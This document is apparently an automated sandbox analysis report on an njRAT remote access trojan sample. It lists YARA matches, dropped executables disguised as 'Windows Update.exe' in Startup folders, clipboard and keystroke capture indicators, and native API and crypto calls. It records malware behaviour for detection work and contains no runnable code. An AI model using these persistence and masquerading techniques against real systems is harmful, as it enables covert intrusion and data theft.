Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.enigmaprotector.com/
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.enigmaprotector.com/openU
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr String found in binary or memory: https://www.smartsharesystems.com/Morten
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Window created: window name: CLIPBRDWNDCLASS
Installs a raw input device (often for capturing keystrokes)
Source: SciTE.exe.1.dr Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \ memstr_2cc260de-a

E-Banking Fraud
barindex
Yara detected Njrat
Source: Yara match File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
PE file contains section with special chars
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
PE file has a writeable .text section
Source: RRqyIX.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
PE file has nameless sections
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\server.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A199DC NtReadFile, 4_2_00A199DC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1996A NtClose, 4_2_00A1996A
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19974 NtSetInformationFile, 4_2_00A19974
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19A34 NtCreateFile, 4_2_00A19A34
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19B14 NtProtectVirtualMemory, 4_2_00A19B14
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A190A2 NtQuerySecurityObject, 4_2_00A190A2
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19098 NtSetSecurityObject, 4_2_00A19098
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A190D8 NtNotifyChangeDirectoryFile, 4_2_00A190D8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19024 NtOpenKeyEx, 4_2_00A19024
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19050 NtSetVolumeInformationFile, 4_2_00A19050
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A191A3 NtFlushBuffersFile, 4_2_00A191A3
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A191BF NtExtendSection, 4_2_00A191BF
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A191C8 NtAccessCheck, 4_2_00A191C8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19130 NtFsControlFile, 4_2_00A19130
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A192AC NtQueryValueKey, 4_2_00A192AC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A192EC NtCreateKey, 4_2_00A192EC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1922C NtOpenKey, 4_2_00A1922C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19236 NtEnumerateValueKey, 4_2_00A19236
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19278 NtQueryKey, 4_2_00A19278
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A193FE NtFlushKey, 4_2_00A193FE
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A193C6 NtDeleteKey, 4_2_00A193C6
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A193CE NtDeleteValueKey, 4_2_00A193CE
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19334 NtEnumerateKey, 4_2_00A19334
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19374 NtSetValueKey, 4_2_00A19374
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A194A4 NtQueryMultipleValueKey, 4_2_00A194A4
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A194F8 NtReplaceKey, 4_2_00A194F8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19438 NtLoadKey2, 4_2_00A19438
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19406 NtLoadKey, 4_2_00A19406
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19442 NtNotifyChangeKey, 4_2_00A19442
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A195A4 NtWriteFile, 4_2_00A195A4
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19586 NtTerminateProcess, 4_2_00A19586
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A195FC NtQueryObject, 4_2_00A195FC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19522 NtSaveKey, 4_2_00A19522
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19502 NtRestoreKey, 4_2_00A19502
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1957E NtUnloadKey, 4_2_00A1957E
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19540 NtSetInformationKey, 4_2_00A19540
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19698 NtQueryDirectoryFileEx, 4_2_00A19698
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19630 NtQueryDirectoryFile, 4_2_00A19630
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A197A6 NtDeleteFile, 4_2_00A197A6
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A197AE NtLockFile, 4_2_00A197AE
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1970C NtOpenSection, 4_2_00A1970C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19716 NtDuplicateObject, 4_2_00A19716
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19760 NtQueryVolumeInformationFile, 4_2_00A19760
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A198B0 NtMapViewOfSection, 4_2_00A198B0
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19810 NtUnlockFile, 4_2_00A19810
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19873 NtUnmapViewOfSection, 4_2_00A19873
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A1987C NtQuerySection, 4_2_00A1987C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19857 NtQueryFullAttributesFile, 4_2_00A19857
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A199A8 NtQueryInformationFile, 4_2_00A199A8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19910 NtCreateSection, 4_2_00A19910
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19958 NtClose, 4_2_00A19958
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19A9C NtOpenFile, 4_2_00A19A9C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A19AEF NtQueryAttributesFile, 4_2_00A19AEF
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18EA8 NtCreateThread, 4_2_00A18EA8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18FBC NtCreateUserProcess, 4_2_00A18FBC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18F0B NtResumeThread, 4_2_00A18F0B
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18F14 NtCreateProcess, 4_2_00A18F14
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00A18F64 NtCreateProcessEx, 4_2_00A18F64
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BEC6 NtQuerySystemInformation, 4_2_00D9BEC6
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_00D9BE8B NtQuerySystemInformation, 4_2_00D9BE8B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A299DC NtReadFile, 14_2_00A299DC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2996A NtClose, 14_2_00A2996A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29974 NtSetInformationFile, 14_2_00A29974
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29A34 NtCreateFile, 14_2_00A29A34
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29B14 NtProtectVirtualMemory, 14_2_00A29B14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A290A2 NtQuerySecurityObject, 14_2_00A290A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A298B0 NtMapViewOfSection, 14_2_00A298B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29098 NtSetSecurityObject, 14_2_00A29098
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A290D8 NtNotifyChangeDirectoryFile, 14_2_00A290D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29024 NtOpenKeyEx, 14_2_00A29024
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29810 NtUnlockFile, 14_2_00A29810
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29873 NtUnmapViewOfSection, 14_2_00A29873
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2987C NtQuerySection, 14_2_00A2987C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29050 NtSetVolumeInformationFile, 14_2_00A29050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29857 NtQueryFullAttributesFile, 14_2_00A29857
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A291A3 NtFlushBuffersFile, 14_2_00A291A3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A299A8 NtQueryInformationFile, 14_2_00A299A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A291BF NtExtendSection, 14_2_00A291BF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A291C8 NtAccessCheck, 14_2_00A291C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29130 NtFsControlFile, 14_2_00A29130
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29910 NtCreateSection, 14_2_00A29910
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29958 NtClose, 14_2_00A29958
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A292AC NtQueryValueKey, 14_2_00A292AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29A9C NtOpenFile, 14_2_00A29A9C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29AEF NtQueryAttributesFile, 14_2_00A29AEF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A292EC NtCreateKey, 14_2_00A292EC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2922C NtOpenKey, 14_2_00A2922C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29236 NtEnumerateValueKey, 14_2_00A29236
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29278 NtQueryKey, 14_2_00A29278
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A293FE NtFlushKey, 14_2_00A293FE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A293C6 NtDeleteKey, 14_2_00A293C6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A293CE NtDeleteValueKey, 14_2_00A293CE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29334 NtEnumerateKey, 14_2_00A29334
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29374 NtSetValueKey, 14_2_00A29374
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A294A4 NtQueryMultipleValueKey, 14_2_00A294A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A294F8 NtReplaceKey, 14_2_00A294F8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29438 NtLoadKey2, 14_2_00A29438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29406 NtLoadKey, 14_2_00A29406
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29442 NtNotifyChangeKey, 14_2_00A29442
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A295A4 NtWriteFile, 14_2_00A295A4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29586 NtTerminateProcess, 14_2_00A29586
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A295FC NtQueryObject, 14_2_00A295FC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29522 NtSaveKey, 14_2_00A29522
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29502 NtRestoreKey, 14_2_00A29502
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2957E NtUnloadKey, 14_2_00A2957E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29540 NtSetInformationKey, 14_2_00A29540
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28EA8 NtCreateThread, 14_2_00A28EA8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29698 NtQueryDirectoryFileEx, 14_2_00A29698
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29630 NtQueryDirectoryFile, 14_2_00A29630
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A297A6 NtDeleteFile, 14_2_00A297A6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A297AE NtLockFile, 14_2_00A297AE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28FBC NtCreateUserProcess, 14_2_00A28FBC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28F0B NtResumeThread, 14_2_00A28F0B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A2970C NtOpenSection, 14_2_00A2970C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29716 NtDuplicateObject, 14_2_00A29716
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28F14 NtCreateProcess, 14_2_00A28F14
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A29760 NtQueryVolumeInformationFile, 14_2_00A29760
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_00A28F64 NtCreateProcessEx, 14_2_00A28F64
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Windows\SysWOW64\Explower.exe Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_03624298 0_2_03624298
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_03624287 0_2_03624287
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE6076 1_2_00AE6076
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE6D00 1_2_00AE6D00
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4290 4_2_02FD4290
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD427F 4_2_02FD427F
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4628 4_2_02FD4628
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4FF8 4_2_02FD4FF8
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD47CC 4_2_02FD47CC
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4F95 4_2_02FD4F95
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD5367 4_2_02FD5367
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4B53 4_2_02FD4B53
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4F27 4_2_02FD4F27
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4707 4_2_02FD4707
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD44E9 4_2_02FD44E9
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD50DB 4_2_02FD50DB
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4C87 4_2_02FD4C87
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD5055 4_2_02FD5055
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD5451 4_2_02FD5451
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD49F1 4_2_02FD49F1
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD4995 4_2_02FD4995
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD453C 4_2_02FD453C
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_02FD492E 4_2_02FD492E
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A36076 15_2_00A36076
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A36D00 15_2_00A36D00
